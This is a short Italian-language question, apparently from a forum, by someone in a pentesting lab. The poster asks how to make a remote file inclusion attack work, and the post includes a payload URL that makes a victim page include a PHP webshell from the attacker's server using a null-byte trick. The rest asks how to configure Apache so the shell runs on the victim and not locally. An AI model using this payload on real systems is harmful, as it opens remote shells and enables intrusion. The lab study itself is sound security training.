Sto usando Kali Linux in un laboratorio di pentesting.
Inserendo il seguente URL sul sistema della vittima posso ottenere l'accesso al mio server Apache (vedo una risposta di 200 accessi nei miei registri), ma il file php viene visualizzato sul mio sistema e quindi ho generato una webshell sul mio scatola:
https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00
In che modo "modifica l'associazione" in apache per impedirne l'esecuzione?
Cambiarlo in .txt
sembra impedirgli di girare su entrambi sistemi; non sono sicuro di poter iniettarlo in questo modo .